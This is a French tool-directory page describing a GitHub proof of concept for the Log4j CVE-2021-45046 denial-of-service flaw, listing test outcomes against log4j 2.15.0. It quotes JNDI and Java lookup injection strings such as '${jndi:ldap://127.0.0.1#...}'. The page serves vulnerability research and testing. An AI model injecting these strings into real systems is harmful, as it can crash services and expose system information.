Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/ludy-dev/cve-2021-45046
Analyse des VulnérabilitésExploitationExploitation d'Applications WebArticles et RechercheApprentissage et Éducation
GitHubludy-dev/cve-2021-45046

cve-2021-45046

Preuve de concept démontrant CVE-2021-45046 (Log4j DoS) avec des cas de test pour les boucles infinies, les exceptions d'argument illégal et l'exposition d'informations système via des recherches JNDI.

Voir le dépôt
1il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

La RCE de log4j (CVE-2021-44228) a été corrigée dans la version 2.15, mais une nouvelle vulnérabilité CVE-2021-45046 (provoquant un DoS) a été découverte. Voici les résultats des tests effectués.

[Environnement de test] log4j-2.15.0 (api , core) JRE-1.8.0 jdk1.8.0_151 Eclipse IDE (Maven Project)

  1. Test de la syntaxe Log4j RCE (CVE-2021-44228) -> Not Vuln

image

  1. Insertion d'un nom d'objet ctx arbitraire -> Not vuln

image

  1. Insertion avec le même nom que l'objet recevant le contexte -> boucle infinie provoquant un DoS

image

  1. Insertion sous la forme ${jndi:ldap://127.0.0.1#[adresse du serveur ldap]} -> UnknownHostException, pas de DoS

image

  1. Format jndi:ldap://[serveur ldap]#[serveur ldap] -> Not vuln

image

  1. Insertion de code Java -> illegalArgmumentException provoquant un DoS

image

7-1. Insertion de syntaxe Java -> Exposition d'informations système

image

7-2. Insertion de syntaxe Java -> illegalArgmumentException, DoS généré

image

-> Lors de la vérification du point de déclenchement de l'illegalArgumentException, la syntaxe Java (${java:version}) qui permet l'exposition d'informations système via une instruction switch case dans 2-5 semble être une routine intentionnelle.

image

Télécharger l’outil